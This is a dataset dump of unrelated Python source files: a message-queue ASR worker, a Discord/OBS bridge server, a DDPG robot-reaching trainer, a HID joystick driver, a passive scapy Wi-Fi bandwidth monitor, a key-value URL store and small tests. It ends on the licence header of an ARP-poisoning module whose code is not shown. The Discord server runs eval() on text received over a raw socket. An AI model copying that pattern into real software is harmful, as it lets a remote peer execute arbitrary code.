source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
worker.py
|
import pika
import time
from DAO.connection import Connection
import os
import multiprocessing
import json
import logging
import ast
from asr.client2 import main
import threading
import functools
LOG_FORMAT = ('%(levelname) -10s %(asctime)s %(name) -30s %(funcName) '
'-35s %(lineno) -5d: %(message)s')
LOGGER = logging.getLogger(__name__)
def callback(channel, method, properties, body, args):
(connection, threads) = args
delivery_tag = method.delivery_tag
t = threading.Thread(target=do_work, args=(connection, channel, delivery_tag, body))
t.start()
threads.append(t)
def do_work(connection, channel, delivery_tag, body):
try:
print(" [x] Received %r" % body, flush=True)
oid = json.loads(body)['oid']
project_id = json.loads(body)['project_id']
conn = Connection()
# file = conn.get_file(oid)
file = conn.get_doc_mongo(file_oid=oid)
result = ast.literal_eval(file.decode('utf-8'))
#print(result, flush=True)
count = 0
dict_result = {}
previous_duration = 0
for key, value in result.items():
result = main(value['bytes'])
dict_result[count] = result
count += 1
#time.sleep(1)
payload = bytes(str(dict_result), encoding='utf-8')
conn = Connection()
# inserts the result of processing in database
file_oid = conn.insert_doc_mongo(payload)
conn.insert_jobs(type='asr', status='done', file=file_oid, project_id=project_id)
message = {'type': 'aggregator', 'status': 'new', 'oid': file_oid, 'project_id': project_id}
# post a message on topic_segmentation queue
connection_out = pika.BlockingConnection(pika.ConnectionParameters(host=os.environ['QUEUE_SERVER']))
channel2 = connection_out.channel()
channel2.queue_declare(queue='aggregator', durable=True)
channel2.basic_publish(exchange='', routing_key='aggregator', body=json.dumps(message))
except Exception as e:
# print(e, flush=True)
print('Connection Error %s' % e, flush=True)
print(" [x] Done", flush=True)
cb = functools.partial(ack_message, channel, delivery_tag)
connection.add_callback_threadsafe(cb)
def ack_message(channel, delivery_tag):
"""Note that `channel` must be the same pika channel instance via which
the message being ACKed was retrieved (AMQP protocol constraint).
"""
if channel.is_open:
channel.basic_ack(delivery_tag)
else:
# Channel is already closed, so we can't ACK this message;
# log and/or do something that makes sense for your app in this case.
pass
def consume():
logging.info('[x] start consuming')
success = False
while not success:
try:
connection = pika.BlockingConnection(
pika.ConnectionParameters(host=os.environ['QUEUE_SERVER'], heartbeat=5))
channel = connection.channel()
success = True
except:
time.sleep(30)
pass
channel.queue_declare(queue='asr', durable=True)
print(' [*] Waiting for messages. To exit press CTRL+C')
channel.basic_qos(prefetch_count=1)
threads = []
on_message_callback = functools.partial(callback, args=(connection, threads))
channel.basic_consume(queue='asr', on_message_callback=on_message_callback)
try:
channel.start_consuming()
except KeyboardInterrupt:
channel.stop_consuming()
# Wait for all to complete
for thread in threads:
thread.join()
connection.close()
consume()
'''
workers = int(os.environ['NUM_WORKERS'])
pool = multiprocessing.Pool(processes=workers)
for i in range(0, workers):
pool.apply_async(consume)
# Stay alive
try:
while True:
continue
except KeyboardInterrupt:
print(' [*] Exiting...')
pool.terminate()
pool.join()'''
|
vlc_discord_server.py
|
import socket # For hosting a server that communicates w/ OBS script
import asyncio # For handling multiple connections
import discord # Requires "pip install discord.py" module for interacting with discord
from dotenv import load_dotenv # Loading environment variables
import os # Getting environment variables
import json # For exporting and importing files
import threading # To run both Discord and Server at same time
import discord_messages as dms
### DISCORD STUFF
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')
client = discord.Client()
@client.event
async def on_ready():
print(f'{client.user} has connected to Discord!')
@client.event
async def on_message(message):
server_id = str(message.guild.id) + "." + str(message.author.id)
# TODO: Add a message prefix, and save to local json file
if message.author == client.user:
return ""
if message.content == 'list':
response = await handle_task(server_id, "LIST_LIBRARY")
list = eval(response)
await dms.send_video_list(client, list, message.channel.id)
if message.content.startswith('search'):
args = message.content.replace("search","",1) # Replaces maximum of 1 use of term 'search' - leaving just the following arguments
response = await handle_task(server_id, "SEARCH", args)
await message.channel.send(response)
if message.content == 'join':
response = "Please enter the following into your OBS Script: " + server_id
await message.channel.send(response)
async def send_dm(message, user_id):
user = await client.fetch_user(user_id)
print("Sending message to: ", user, "\n",message)
await user.send(message)
#TODO: Split out this embed code into a separate file determining how messages should look
#client.run(TOKEN)
### END DISCORD STUFF
clients = {} # uses Task as key and (reader,writer) as value
server_ids = {}
HOST = '' # Empty string means assign to all interfaces
PORT = 8420
async def handle_task(server_id, task, arg=None):
global server_ids
print("Looking for server: " + str(server_id))
print("Current servers connected: " + str(server_ids))
if server_id in server_ids:
client_reader, client_writer = server_ids[server_id]
response = await handle_client(client_reader,client_writer,task, arg)
if response == "":
response = "No message received from Client"
return response
else:
return "No OBS script connected"
def accept_client(client_reader,client_writer):
global clients
task = asyncio.Task(handle_client(client_reader,client_writer,"HELLO"))
clients[task] = (client_reader, client_writer)
def delete_client(task):
del clients[task]
client_writer.close()
#task.add_done_callback(delete_client)
async def handle_client(client_reader, client_writer, task, arg=None):
global server_ids
try:
client_writer.write("Hello\n".encode())
await client_writer.drain()
data = await asyncio.wait_for(client_reader.readline(), 5) # Wait for 5 seconds
if data is None:
print("I'm getting no data from the client")
string_data = data.decode().rstrip()
if "Heyo" not in string_data:
print("Not getting the expected response from the client")
return ""
else:
print("Client says: Heyo")
server_id = string_data.split(':')[1]
print("Server connected: " + server_id)
# TODO: Only send this on initial connection, not on subsequent commands
if server_id not in server_ids:
await send_dm("OBS client connected from: " + str(client_writer._transport.get_extra_info('peername')[0]), server_id.split('.')[1])
# TODO: If there's already a server connected here, close it properly, then set a new one
server_ids[server_id] = (client_reader, client_writer)
if arg:
task = task + "~" + arg + "\n" #add arg delimited by ~
else:
task = task + "\n" # append to make it a single line
client_writer.write(task.encode())
await client_writer.drain()
data = await asyncio.wait_for(client_reader.readline(), 5)
string_data = data.decode().rstrip()
print("Received data: " + string_data)
return string_data
except ConnectionResetError:
return "Client has been disconnected"
except asyncio.TimeoutError:
return "Connection timed out"
def main():
loop = asyncio.get_event_loop()
server_task = asyncio.start_server(accept_client, HOST, PORT)
loop.run_until_complete(server_task)
loop.run_until_complete(client.run(TOKEN))
loop.run_forever()
if __name__ == '__main__':
main()
#
# async def handle_connection(reader,writer):
# data = await reader.read(100)
# message = data.decode()
# addr = writer.get_extra_info('peername')
# print("Received: " + message + " from " + str(addr))
# writer.write("Hello")
# await writer.drain()
# print("Closing")
# writer.close()
#
# async def start_server(HOST,PORT):
# loop = asyncio.get_event_loop()
# coro = asyncio.start_server(handle_connection, HOST, PORT, loop=loop)
# # THere's an issue with this line that causes it to never complete :/
# server = loop.run_until_complete(coro)
#
# print('Serving on {}'.format(server.sockets[0].getsockname()))
# try:
# loop.run_forever()
# except KeyboardInterrupt:
# pass
#
# server.close()
# loop.run_until_complete(server.wait_closed())
# loop.close()
#
# if __name__ == '__main__':
# t1 = threading.Thread(target=client.run, args=(TOKEN))
# await start_server(HOST,PORT)
# t1.start()
#
# with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as serversock:
# serversock.bind((HOST, PORT))
# serversock.listen(5)
# while True:
# # Accept a connection from external
# clientsock, addr = serversock.accept()
# with clientsock:
# print("Connected to by: ", addr)
# token = clientsock.recv(MSG_LENGTH)
# #command = input("Please enter command")
# #command_bytes = command.encode('utf-8')
# clientsock.sendall(command_bytes)
|
gym_reach7dof_train_1a.py
|
#### Training agent in Pusher7Dof gym env using a single real-world env
## 1a,1b : Trying threading for running rendering in parallel while taking actions
## Wrtitten by : leopauly | cnlp@leeds.ac.uk
## Courtesy for DDPG implementation : Steven Spielberg Pon Kumar (github.com/stevenpjg)
####
##Imports
import gym
from gym.spaces import Box, Discrete
import numpy as np
import cv2
from ddpg import DDPG
from ou_noise import OUNoise
import matplotlib.pyplot as plt
import scipy.misc as misc
## Imports for DNN
import os
from threading import Thread, Lock
import sys
from six.moves import xrange # pylint: disable=redefined-builtin
import PIL.Image as Image
import random
import numpy as np
import cv2
import time
import math
import matplotlib.pyplot as plt
import tensorflow as tf
from keras import backend as K
## Custom scripts
import lscript as lsp
import modelling as md
## Defining env
env = gym.make('Pusher7DOF-v1')
env.reset()
assert isinstance(env.observation_space, Box), "observation space must be continuous"
assert isinstance(env.action_space, Box), "action space must be continuous"
## Defining vars for reinfrocement learning algo
num_episodes=1000
num_rollouts=200
steps=num_rollouts
is_batch_norm = False #batch normalization switch
xrange=range
start_training=64
## vars for feature extraction
height=112
width=112
channel=3
crop_size=112
cluster_length=16
nb_classes=2
feature_size=4608 #8192 #16384 #487
saved_path='/home/ironman/trained_activity_nets/'
batch_size=32
demo_folder='./Demo_reach_1/'
## Defining placeholders in tf for images and targets
x_image = tf.placeholder(tf.float32, [None, 16,height,width,channel],name='x')
y_true = tf.placeholder(tf.float32, [None, nb_classes],name='y_true')
y_true_cls = tf.placeholder(tf.int64, [None],name='y_true_cls')
model_keras = md.C3D_ucf101_training_model_tf(summary=True)
out=model_keras(x_image)
y_pred = tf.nn.softmax(out)
y_pred_cls = tf.argmax(out, dimension=1)
correct_prediction = tf.equal(y_pred_cls, y_true_cls)
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print('Loading netwrok framework finished..!!',flush=True)
def get_compress_frames_data(filename, num_frames_per_clip=cluster_length):
ret_arr = []
for parent, dirnames, filenames in os.walk(filename):
filenames = sorted(filenames)
jump=math.floor((len(filenames)/num_frames_per_clip))
loop=0
for i in range(0,len(filenames),jump):
if (loop>15):
break
if (filenames[i].endswith('.png')):
image_name = str(filename) + '/' + str(filenames[i])
img = Image.open(image_name)
img_data = np.array(img)
ret_arr.append(img_data)
loop=loop+1
ret_arr=np.array(ret_arr)
#ret_arr=ret_arr/255
return ret_arr
## Start the session with logging placement.
init_op = tf.global_variables_initializer()
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=False))
sess.run(init_op)
## Restore model weights from previously saved model
saver = tf.train.import_meta_graph(os.path.join(saved_path,'activity_model.ckpt-104.meta'))
saver.restore(sess, os.path.join(saved_path,'activity_model.ckpt-104'))
print("Model restored from file: %s" % saved_path,flush=True)
def demo_feature_extractor(demo_vid_path):
demo_vid_array=get_compress_frames_data(demo_vid_path)
return feature_extractor(demo_vid_array)
## For extracting activity features
def feature_extractor(vid_np):
#print('shape of video for feature extraction:',vid_np.shape)
vid_=vid_np.reshape(-1,cluster_length,height,width,channel)
#print(tf.contrib.graph_editor.get_tensors(tf.get_default_graph()))
#print(tf.get_default_graph().as_graph_def())
f_v = sess.graph.get_tensor_by_name('flatten_1/Reshape:0')
f_v_val=np.array(sess.run([f_v], feed_dict={'conv1_input:0':vid_,x_image:vid_,K.learning_phase(): 0 }))
#print('extracted video features shape:',f_v_val.shape)
features=np.reshape(f_v_val,(-1))
#print('features_shape',features.shape)
return features
def distance(f_demo,f_robo):
#print('shape f_demo',f_demo.shape,'shape f_demo',f_robo.shape)
return np.linalg.norm(f_demo-f_robo)
def s2l():
#Randomly initialize critic,actor,target critic, target actor network and replay buffer
num_states = feature_size #num_states = env.observation_space.shape[0]
num_actions = env.action_space.shape[0]
print ("Number of States:", num_states)
print ("Number of Actions:", num_actions)
agent = DDPG(env, is_batch_norm,num_states,num_actions)
exploration_noise = OUNoise(env.action_space.shape[0])
counter=0
reward_per_episode = 0
total_reward=0
print ("Number of Steps per episode:", steps)
reward_st = np.array([0]) #saving reward
demo_features=demo_feature_extractor(demo_folder)
for episode in range(num_episodes):
print ("==== Starting episode no:",episode,"====","\n")
env.reset() # Reset env in the begining of each episode
env.render()
obs_vid=[]
for i in range(16):
obs_img=env.render(mode='rgb_array') # Get the observation
obs_new=misc.imresize(obs_img,[112,112,3])
obs_vid.append(obs_new)
obs_vid=np.array(obs_vid)
observation =feature_extractor(obs_vid)
reward_per_episode = 0
for t in range(steps):
x = observation
action = agent.evaluate_actor(np.reshape(x,[1,num_states]))
noise = exploration_noise.noise()
action = action[0] + noise #Select action according to current policy and exploration noise
print ("Action at step", t ," :",action,"\n")
child_thread = Thread(target=child_function)
child_thread.start()
with io_lock:
_,_,done,info=env.step(action)
env.render()
print("Parent process continuing.")
vid_robo_=[]
for i in range(16):
obs=env.render(mode='rgb_array') # Get the observation
obs_new=misc.imresize(obs,[112,112,3])
vid_robo_.append(obs_new)
vid_robo=np.array(vid_robo_)
robo_features=feature_extractor(vid_robo)
observation=robo_features
reward=-(distance(demo_features,robo_features))
print('reward: ',reward)
#add s_t,s_t+1,action,reward to experience memory
agent.add_experience(x,observation,action,reward,done)
#train critic and actor network
if counter > start_training:
agent.train()
reward_per_episode+=reward
counter+=1
#check if episode ends:
if (done or (t == steps-1)):
print ('EPISODE: ',i,' Steps: ',t,' Total Reward: ',reward_per_episode)
print ("Printing reward to file")
exploration_noise.reset() #reinitializing random noise for action exploration
reward_st = np.append(reward_st,reward_per_episode)
np.savetxt('episode_reward.txt',reward_st, newline="\n")
print ('\n\n')
break
total_reward+=reward_per_episode
print ("Average reward per episode {}".format(total_reward / episodes))
def child_function():
i = 1000*20394
print("Child starts recording. Did stuff: " + str(i))
return
io_lock = Lock()
s2l()
|
JoyHIDOutput.py
|
'''
Created on Nov 22, 2021
@author: Japi42
'''
import threading
from struct import pack
from Outputs.Output import Output
condition = threading.Condition()
inited = False
x_axis = 0
y_axis = 0
my_buttons = 0
dirty = False
devhandle = None
# Need a thread for working
# Need a condition for thread safety
# Need an array of states for output
def startup():
global inited
if not inited:
print("Starting up Update Joystick Thread")
ut = threading.Thread(name='UpdateJoystickThread', target=updateJoystickThread)
ut.start()
inited = True
def setButton(button, state):
global my_buttons
global condition
global dirty
with condition:
if state:
my_buttons |= (1<<button)
else:
my_buttons &= ~(1<<button)
dirty = True
condition.notifyAll()
def initJoystick(devname="/dev/hidg0"):
global devhandle
global dirty
print("Initing joystick")
devhandle = open(devname, 'wb+')
x_axis = 0
y_axis = 0
my_buttons = 0
dirty = False
report = buildHIDReport()
writeHIDReport(report)
print("Init done")
def writeHIDReport(report):
global devhandle
devhandle.write(report)
devhandle.flush()
def buildHIDReport():
report = pack('<bbH', x_axis, y_axis, my_buttons)
return report
def updateJoystickThread():
global condition
global dirty
initJoystick()
while True:
with condition:
condition.wait_for(checkControlsUpdate)
report = pack('<bbH', x_axis, y_axis, my_buttons)
dirty = False
writeHIDReport(report)
def checkControlsUpdate():
global condition
global dirty
with condition:
return dirty
class JoyHIDOutput:
def __init__(self, output_id, button_num):
Output.__init__(self)
self.id = output_id
self.button_num = button_num
startup()
def setState(self, state):
with self.condition:
self.state = state
setButton(self.button_num, state)
print(str(self.id) + " changed to " + str(state))
|
tcc-teste.py
|
#!/usr/bin/python2.7
import time
from threading import Thread
import threading, Queue
class cabeca(object):
def __init__(self):
self.nome = None
def check_infos(user_id, queue):
result = user_id+5*2+4*20
queue.put(result)
def soma(i):
return i+5*2+4*20
queued_request = Queue.Queue()
lista_teste = []
lista_teste_2 = []
for i in range(6000):
lista_teste.append(i+3)
lista_teste_2.append(i+10)
tempo = time.clock()
for i in range(6000):
check_infos_thread = threading.Thread(target=check_infos, args=(lista_teste[i], queued_request))
check_infos_thread.start()
final_result = queued_request.get()
lista_teste[i] = final_result
print "Tempo Thread %s"%(time.clock()-tempo)
tempo = time.clock()
for i in range(6000):
teste = soma(lista_teste_2[i])
lista_teste_2[i] = teste
print "Tempo Normal %s"%(time.clock()-tempo)
#print lista_teste
cabeca = cabeca()
cabeca.nome = "Felipe"
for i in range(2):
lista_teste[i] = cabeca
print lista_teste[0].nome
|
Network.py
|
import Device
from scapy.all import *
import threading
from pylab import *
import matplotlib.pyplot as plt
import time
import os
class Network:
num_devices = 0
device_list = {}
bwUsageHistory = {}
def Join_device(self, mac_addr, ip_addr=None):
dev = Device.device(mac_addr, ip_addr)
self.device_list[mac_addr] = dev
print 'Join the device %s' %(mac_addr)
def Does_Device_Exist (self, mac_addr) :
if self.device_list.has_key(mac_addr):
return True
else:
return False
def Delete_device(self, mac_addr):
del self.device_list[mac_addr]
print 'Delete the device'
def plotUSage (self, sleepCount ) :
xdata = []
ydata = []
positions = []
count = 0
totalBandwidth = 0
for mac, device in self.device_list.items():
xdata.append(mac)
deviceBandwidth = device.get_bandwidth()
device.reset_bandwidth()
totalBandwidth = totalBandwidth + deviceBandwidth
ydata.append(deviceBandwidth)
positions.append(count+0.5)
count = count + 0.5
bar(positions,ydata, align='center')
xticks(positions, xdata)
ylabel('Bandwidth')
title('Total bandwidth usage in last 5 min')
grid(True)
savefig("usage5Min.png")
plt.clf()
print 'Plot image is ready. Name %s' %('usage5Min.png')
if (sleepCount % 6 == 0):
print '## Printing total usage %s' %(totalBandwidth)
self.bwUsageHistory[sleepCount/6] = totalBandwidth
times = self.bwUsageHistory.keys()
totals = self.bwUsageHistory.values()
plt.plot(times, totals)
grid(True)
os.system('/bin/mv totalUsage.png totalUsageSofar.png')
savefig("totalUsage.png")
plt.clf()
def Display_devices(self):
pass
def Process_packet(self, pkt = None):
for key, value in pkt.items():
self.device_list[key].consume_bandwidth(value)
def PktHeaderParser (pkt):
if pkt.haslayer(Dot11):
wrlsHdr = pkt[Dot11]
dst = wrlsHdr.fields['addr1']
src = wrlsHdr.fields['addr2']
addr3 = wrlsHdr.fields['addr3']
if src != None:
if not network.Does_Device_Exist (src):
network.Join_device (src)
network.Process_packet({ src: len(pkt)})
def startMonitor():
sniff(iface="mon0", prn = PktHeaderParser)
global network
if __name__=="__main__":
network = Network()
t= threading.Thread(target=startMonitor)
t.start()
sleepCount = 0
while True:
time.sleep(3)
sleepCount +=1
network.plotUSage(sleepCount)
|
mmc_positioner.py
|
"""
Mock MMC support in ophyd/Bluesky
"""
from ophyd import Component
from ophyd import Signal
from ophyd.mixins import SignalPositionerMixin
from ophyd.status import MoveStatus
from sim_mmc_controller import SimMMC
import threading
import time
import warnings
class SoftMMCPositioner(SignalPositionerMixin, Signal):
_move_thread = None
def __init__(self, *args, mmc=None, mmc_label="", **kwargs):
self.mmc = mmc
self.mmc_label = mmc_label
super().__init__(*args, set_func=self._write_xy, **kwargs)
# get the position from the controller on startup
self._readback = self.mmc.getXYPosition()
def _write_xy(self, value, **kwargs):
if self._move_thread is not None:
# The MoveStatus object defends us; this is just an additional safeguard.
# Do not ever expect to see this warning.
warnings.warn("Already moving. Will not start new move.")
st = MoveStatus(self, target=value)
def moveXY():
self.mmc.setXYPosition(value)
# ALWAYS wait for the device
self.mmc.waitForDevice(self.mmc_label)
# update the _readback attribute (which triggers other ophyd actions)
self._readback = self.mmc.getXYPosition()
# MUST set to None BEFORE declaring status True
self._move_thread = None
st.set_finished()
self._move_thread = threading.Thread(target=moveXY)
self._move_thread.start()
return st
def demonstrate_mmc_positioner(mmc):
# What's it look like?
print(f"{mmc = }")
# Will it set()?
st = mmc.set((2.1, -.1))
print(f"{st = }")
while not st.done:
time.sleep(0.26)
print(f"{st = }")
print(f"{mmc = }")
# Will it get()?
try:
print(f"{mmc.get() = }")
except Exception as exc:
print(f"{exc = }")
# Will it put()?
try:
t0 = time.time()
print(f"{mmc.put((4, .2)) = }")
print(f"{time.time()-t0:f}s")
print(f"{mmc = }")
except Exception as exc:
print(f"{exc = }")
# Will it read()?
print(f"{mmc.read() = }")
# Will it move()?
try:
t0 = time.time()
print(f"{mmc.move((.6, -.7)) = }")
print(f"{time.time()-t0:f}s")
print(f"{mmc = }")
print(f"{mmc.position = }")
except Exception as exc:
print(f"{exc = }")
|
concurrency.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2010 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
import threading
import unittest
from trac.util.concurrency import ThreadLocal
class ThreadLocalTestCase(unittest.TestCase):
def test_thread_local(self):
local = ThreadLocal(a=1, b=2)
local.b = 3
local.c = 4
local_dict = [local.__dict__.copy()]
def f():
local.b = 5
local.d = 6
local_dict.append(local.__dict__.copy())
thread = threading.Thread(target=f)
thread.start()
thread.join()
self.assertEqual(dict(a=1, b=3, c=4), local_dict[0])
self.assertEqual(dict(a=1, b=5, d=6), local_dict[1])
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(ThreadLocalTestCase, 'test'))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
static_url_store.py
|
#
# (C) Copyright 2012 Enthought, Inc., Austin, TX
# All right reserved.
#
# This file is open source software distributed according to the terms in LICENSE.txt
#
"""
Static URL Store
================
This module contains the :py:class:`~StaticURLStore` store that communicates
with a remote HTTP server which provides the actual data storage. This is a
simple read-only store that can be run against a static HTTP server which
provides a json file with all metadata and then serves data from URLs from
another path. The metadata URL is polled periodically for updates.
A typical static server might be layed out as::
base_directory/
index.json
data/
key1
key2
...
"""
import threading
import json
from six.moves import urllib
import time
from .abstract_store import AbstractReadOnlyStore
from .events import StoreUpdateEvent, StoreSetEvent, StoreDeleteEvent
from .url_value import URLValue
from .utils import add_context_manager_support
def basic_auth_factory(**kwargs):
""" A factory that creates a :py:class:`~.HTTPBasicAuthHandler` instance
The arguments are passed directly through to the :py:meth:`add_password`
method of the handler.
"""
auth_handler = urllib.request.HTTPBasicAuthHandler()
auth_handler.add_password(**kwargs)
class StaticURLStore(AbstractReadOnlyStore):
""" A read-only key-value store that is a front end for data served via URLs
All data is assumed to be served from some root url. In addition
the store requires knowledge of two paths: a data prefix URL which is a
partial URL to which the keys will be appended when requesting data, and a
query URL which is a single URL which provides all metadata as a json
encoded file.
For example, an HTTP server may store data at URLs of the form::
http://www.example.com/data/<key>
and may store the metadata at::
http://www.example.com/index.json
These would have a root url of "http://www.example.com/", a data path
of "data/" and a query path of "index.json".
All queries are performed using urllib.urlopen, so this store can be
implemented by an HTTP, FTP or file server which serves static files. When
connecting, if appropriate credentials are supplied then HTTP authentication
will be used when connecting the remote server
.. warning::
Since we use urllib without any further modifications, HTTPS requests
do not validate the server's certificate.
Because of the limited nature of the interface, this store implementation
is read only, and handles updates via periodic polling of the query prefix
URL. This guarantees that the viewed data is always consistent, it just may
not be current. Most of the work of querying is done on the client side
using the cached metadata.
Parameters
----------
event_manager :
An event_manager which implements the :py:class:`~.abstract_event_manager.BaseEventManager`
API.
root_url : str
The base url that data is served from.
data_path : str
The URL prefix that the data is served from.
query_path : str
The URL that the metadata is served from.
poll : float
The polling frequency for the polling thread. Polls every 5 min by default.
"""
def __init__(self, root_url, data_path, query_path, poll=300):
super(StaticURLStore, self).__init__()
self.root_url = root_url
self.data_path = data_path
self.query_path = query_path
self.poll = poll
self._opener = None
self._index = None
self._index_lock = threading.Lock()
self._index_thread = None
def connect(self,
credentials=None,
proxy_handler=None,
auth_handler_factory=None):
""" Connect to the key-value store, optionally with authentication
This method creates appropriate urllib openers for the store.
Parameters
----------
credentials : dict
A dictionary which has at least keys 'username' and 'password'
and optional keys 'uri' and 'realm'. The 'uri' will default to
the root url of the store, and 'realm' will default to
'encore.storage'.
proxy_handler : urllib.ProxyHandler
An optional urllib.ProxyHandler instance. If none is provided
then urllib will create a proxy handler from the user's environment
if needed.
auth_handler_factory :
An optional factory to build urllib authenticators. The credentials
will be passed as keyword arguments to this handler's add_password
method.
"""
if credentials is not None:
if auth_handler_factory is None:
auth_handler_factory = urllib.request.HTTPBasicAuthHandler
args = {'uri': self.root_url, 'realm': 'encore.storage'}
args.update(credentials)
auth_handler = auth_handler_factory()
auth_handler.add_password(**args)
if proxy_handler is None:
self._opener = urllib.request.build_opener(auth_handler)
else:
self._opener = urllib.request.build_opener(proxy_handler,
auth_handler)
else:
if proxy_handler is None:
self._opener = urllib.request.build_opener()
else:
self._opener = urllib.request.build_opener(auth_handler)
self.update_index()
if self.poll > 0:
self._index_thread = threading.Thread(target=self._poll)
self._index_thread.start()
def disconnect(self):
""" Disconnect from the key-value store
This method disposes or disconnects to any long-lived resources that the
store requires.
"""
if self._index_thread is not None:
self._index_thread.join()
self._index_thread = None
self._opener = None
def is_connected(self):
""" Whether or not the store is currently connected
Returns
-------
connected : bool
Whether or not the store is currently connected.
"""
return self._opener is not None
def info(self):
""" Get information about the key-value store
Returns
-------
metadata : dict
A dictionary of metadata giving information about the key-value store.
"""
return {'readonly': True}
##########################################################################
# Basic Create/Read/Update/Delete Methods
##########################################################################
def get(self, key):
""" Retrieve a stream of data and metdata from a given key in the key-value store.
Parameters
----------
key : string
The key for the resource in the key-value store. They key is a unique
identifier for the resource within the key-value store.
Returns
-------
data : file-like
A readable file-like object that provides stream of data from the
key-value store. This is the same type of filelike object returned
by urllib's urlopen function.
metadata : dictionary
A dictionary of metadata for the key.
Raises
------
KeyError :
If the key is not found in the store, a KeyError is raised.
"""
url = self.root_url + urllib.parse.quote(self.data_path + key)
with self._index_lock:
metadata = self._index[key].copy()
return URLValue(url, metadata, self._opener)
def get_data(self, key):
""" Retrieve a stream from a given key in the key-value store.
Parameters
----------
key : string
The key for the resource in the key-value store. They key is a unique
identifier for the resource within the key-value store.
Returns
-------
data : file-like
A readable file-like object the that provides stream of data from the
key-value store. This is the same type of filelike object returned
by urllib's urlopen function.
Raises
------
KeyError :
This will raise a key error if the key is not present in the store.
"""
if self.exists(key):
url = self.root_url + urllib.parse.quote(self.data_path + key)
stream = self._opener.open(url)
add_context_manager_support(stream)
return stream
else:
raise KeyError(key)
def get_metadata(self, key, select=None):
""" Retrieve the metadata for a given key in the key-value store.
Parameters
----------
key : string
The key for the resource in the key-value store. They key is a unique
identifier for the resource within the key-value store.
select : iterable of strings or None
Which metadata keys to populate in the result. If unspecified, then
return the entire metadata dictionary.
Returns
-------
metadata : dict
A dictionary of metadata associated with the key. The dictionary
has keys as specified by the select argument. If a key specified in
select is not present in the metadata, then it will not be present
in the returned value.
Raises
------
KeyError :
This will raise a key error if the key is not present in the store.
"""
with self._index_lock:
if select is None:
return self._index[key].copy()
else:
metadata = self._index[key]
return dict((s, metadata[s]) for s in select if s in metadata)
def exists(self, key):
""" Test whether or not a key exists in the key-value store
Parameters
----------
key : string
The key for the resource in the key-value store. They key is a unique
identifier for the resource within the key-value store.
Returns
-------
exists : bool
Whether or not the key exists in the key-value store.
"""
with self._index_lock:
return key in self._index
##########################################################################
# Querying Methods
##########################################################################
def query(self, select=None, **kwargs):
""" Query for keys and metadata matching metadata provided as keyword arguments
This provides a very simple querying interface that returns precise
matches with the metadata. If no arguments are supplied, the query
will return the complete set of metadata for the key-value store.
Parameters
----------
select : iterable of strings or None
An optional list of metadata keys to return. If this is not None,
then the metadata dictionaries will only have values for the specified
keys populated.
kwargs :
Arguments where the keywords are metadata keys, and values are
possible values for that metadata item.
Returns
-------
result : iterable
An iterable of (key, metadata) tuples where metadata matches
all the specified values for the specified metadata keywords.
If a key specified in select is not present in the metadata of a
particular key, then it will not be present in the returned value.
"""
with self._index_lock:
if select is not None:
for key, metadata in list(self._index.items()):
if all(
metadata.get(arg) == value
for arg, value in list(kwargs.items())):
yield key, dict((metadata_key, metadata[metadata_key])
for metadata_key in select
if metadata_key in metadata)
else:
for key, metadata in list(self._index.items()):
if all(
metadata.get(arg) == value
for arg, value in list(kwargs.items())):
yield key, metadata.copy()
def query_keys(self, **kwargs):
""" Query for keys matching metadata provided as keyword arguments
This provides a very simple querying interface that returns precise
matches with the metadata. If no arguments are supplied, the query
will return the complete set of keys for the key-value store.
This is equivalent to ``self.query(**kwargs).keys()``, but potentially
more efficiently implemented.
Parameters
----------
kwargs :
Arguments where the keywords are metadata keys, and values are
possible values for that metadata item.
Returns
-------
result : iterable
An iterable of key-value store keys whose metadata matches all the
specified values for the specified metadata keywords.
"""
with self._index_lock:
for key, metadata in list(self._index.items()):
if all(
metadata.get(arg) == value
for arg, value in list(kwargs.items())):
yield key
##########################################################################
# Utility Methods
##########################################################################
def update_index(self):
""" Request the most recent version of the metadata
This downloads the json file at the query_path location, and updates
the local metadata cache with this information. It then emits events
that represent the difference between the old metadata and the new
metadata.
This method is normally called from the polling thread, but can be called
by other code when needed. It locks the metadata index whilst performing
the update.
"""
url = self.root_url + self.query_path
with self._index_lock:
result = self._opener.open(url)
# Py3: http.client.HTTPResponse always returns bytes --> convert to
# str/unicode to make sure loads is happy
index = json.loads(result.read().decode('ascii'))
old_index = self._index
self._index = index
# emit update events
# XXX won't detect changes to data if metadata doesn't change as well!
if old_index is not None:
old_keys = set(old_index)
new_keys = set(index)
for key in (old_keys - new_keys):
self.event_manager.emit(
StoreDeleteEvent(
self, key=key, metadata=old_index[key]))
for key in (new_keys - old_keys):
self.event_manager.emit(
StoreSetEvent(
self, key=key, metadata=index[key]))
for key in (new_keys & old_keys):
if old_index[key] != index[key]:
self.event_manager.emit(
StoreUpdateEvent(
self, key=key, metadata=index[key]))
##########################################################################
# Private Methods
##########################################################################
def _poll(self):
t = time.time()
while self._opener is not None:
if time.time() - t >= self.poll:
self.update_index()
t = time.time()
# tick
time.sleep(0.5)
|
ModuleArpPosion.py
|
#The MIT License (MIT)
#Copyright (c) 2015-2016 mh4x0f P0cL4bs Team
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
